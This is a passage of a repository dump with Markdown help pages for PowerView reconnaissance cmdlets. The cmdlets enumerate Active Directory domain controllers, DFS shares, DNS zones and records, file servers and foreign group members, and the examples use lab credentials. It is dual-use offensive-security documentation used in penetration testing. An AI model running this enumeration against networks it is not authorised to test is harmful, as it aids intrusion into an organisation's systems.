domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.Computer\r\n\r\nCustom PSObject with translated computer property fields.\r\n\r\nPowerView.Computer.Raw\r\n\r\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainController.md",
    "content": "# Get-DomainController\r\n\r\n## SYNOPSIS\r\nReturn the domain controllers for the current (or specified) domain.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Get-Domain\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainController [[-Domain] <String>] [-Server <String>] [-LDAP] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates the domain controllers for the current or specified domain.\r\nBy default built in .NET methods are used.\r\nThe -LDAP switch uses Get-DomainComputer\r\nto search for domain controllers.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainController -Domain 'test.local'\r\n```\r\n\r\nDetermine the domain controllers for 'test.local'.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainController -Domain 'test.local' -LDAP\r\n```\r\n\r\nDetermine the domain controllers for 'test.local' using LDAP queries.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n'test.local' | Get-DomainController\r\n```\r\n\r\nDetermine the domain controllers for 'test.local'.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainController -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nThe domain to query for domain controllers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAP\r\nSwitch.\r\nUse LDAP queries to determine the domain controllers instead of built in .NET methods.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.Computer\r\n\r\nOutputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.\r\n\r\nSystem.DirectoryServices.ActiveDirectory.DomainController\r\n\r\nIf -LDAP isn't specified.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainDFSShare.md",
    "content": "# Get-DomainDFSShare\r\n\r\n## SYNOPSIS\r\nReturns a list of all fault-tolerant distributed file systems\r\nfor the current (or specified) domain.\r\n\r\nAuthor: Ben Campbell (@meatballs__)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainDFSShare [[-Domain] <String[]>] [[-SearchBase] <String>] [[-Server] <String>]\r\n [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>] [-Tombstone]\r\n [[-Credential] <PSCredential>] [[-Version] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function searches for all distributed file systems (either version\r\n1, 2, or both depending on -Version X) by searching for domain objects\r\nmatching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively\r\nThe server data is parsed appropriately and returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainDFSShare\r\n```\r\n\r\nReturns all distributed file system shares for the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainDFSShare -Domain testlab.local\r\n```\r\n\r\nReturns all distributed file system shares for the 'testlab.local' domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainDFSShare -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DomainName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 7\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Version\r\n{{Fill Version Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 8\r\nDefault value: All\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.Automation.PSCustomObject\r\n\r\nA custom PSObject describing the distributed file systems.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainDNSRecord.md",
    "content": "# Get-DomainDNSRecord\r\n\r\n## SYNOPSIS\r\nEnumerates the Active Directory DNS records for a given zone.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainDNSRecord [-ZoneName] <String> [-Domain <String>] [-Server <String>] [-Properties <String[]>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nGiven a specific Active Directory DNS zone name, query for all 'dnsNode'\r\nLDAP entries using that zone as the search base.\r\nReturn all DNS entry results\r\nand use Convert-DNSRecord to try to convert the binary DNS record blobs.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainDNSRecord -ZoneName testlab.local\r\n```\r\n\r\nRetrieve all records for the testlab.local zone.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainDNSZone | Get-DomainDNSRecord\r\n```\r\n\r\nRetrieve all records for all zones in the current domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local\r\n```\r\n\r\nRetrieve all records for all zones in the dev.testlab.local domain.\r\n\r\n## PARAMETERS\r\n\r\n### -ZoneName\r\nSpecifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nThe domain to query for zones, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to for the search.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Name,distinguishedname,dnsrecord,whencreated,whenchanged\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.DNSRecord\r\n\r\nOutputs custom PSObjects with detailed information about the DNS record entry.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainDNSZone.md",
    "content": "# Get-DomainDNSZone\r\n\r\n## SYNOPSIS\r\nEnumerates the Active Directory DNS zones for a given domain.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainDNSZone [[-Domain] <String>] [-Server <String>] [-Properties <String[]>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainDNSZone\r\n```\r\n\r\nRetrieves the DNS zones for the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local\r\n```\r\n\r\nRetrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nThe domain to query for zones, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to for the search.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.DNSZone\r\n\r\nOutputs custom PSObjects with detailed information about the DNS zone.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainFileServer.md",
    "content": "# Get-DomainFileServer\r\n\r\n## SYNOPSIS\r\nReturns a list of servers likely functioning as file servers.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainFileServer [[-Domain] <String[]>] [[-LDAPFilter] <String>] [[-SearchBase] <String>]\r\n [[-Server] <String>] [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>]\r\n [-Tombstone] [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns a list of likely fileservers by searching for all users in Active Directory\r\nwith non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying\r\nthe server names.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainFileServer\r\n```\r\n\r\nReturns active file servers for the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainFileServer -Domain testing.local\r\n```\r\n\r\nReturns active file servers for the 'testing.local' domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainFileServer -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DomainName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 7\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 8\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### String\r\n\r\nOne or more strings representing file server names.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainForeignGroupMember.md",
    "content": "# Get-DomainForeignGroupMember\r\n\r\n## SYNOPSIS\r\nEnumerates groups with users outside of the group's domain and returns\r\neach foreign member.\r\nThis is a domain's \"incoming\" access.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-Domain, Get-DomainGroup\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainForeignGroupMember [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nUses Get-DomainGroup to enumerate all groups for the current (or target) domain,\r\nthen enumerates the members of each group, and compares the member's domain\r\nname to the parent group's domain name, outputting the member if the domains differ.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainForeignGroupMember\r\n```\r\n\r\nReturn all group members in the current domain where the group and member differ.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainForeignGroupMember -Domain dev.testlab.local\r\n```\r\n\r\nReturn all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred\r\n\r\nReturn all group members in the dev.testlab.local domain where the member is\r\nnot in dev.testlab.local.\r\nbinding to the secondary.dev.testlab.local for\r\nqueries, and using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ForeignGroupMember\r\n\r\nCustom PSObject with translated group member property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainForeignUser.md",
    "content": "# Get-DomainForeignUser\r\n\r\n## SYNOPSIS\r\nEnumerates users who are in groups outside of the user's domain.\r\nThis is a domain's \"outgoing\" access.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-Domain, Get-DomainUser\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainForeignUser [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nUses Get-DomainUser to enumerate all users for the current (or target) domain,\r\nthen calculates the given user's domain name based on the user's distinguishedName.\r\nThis domain name is compared to the queried domain, and the user object is\r\noutput if they differ.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainForeignUser\r\n```\r\n\r\nReturn all users in the current domain who are in groups not in the\r\ncurrent domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainForeignUser -Domain dev.testlab.local\r\n```\r\n\r\nReturn all users in the dev.testlab.local domain who are in groups not in the\r\ndev.testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred\r\n\r\nReturn all users in the dev.testlab.local domain who are in groups not in the\r\ndev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and\r\nusing the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, 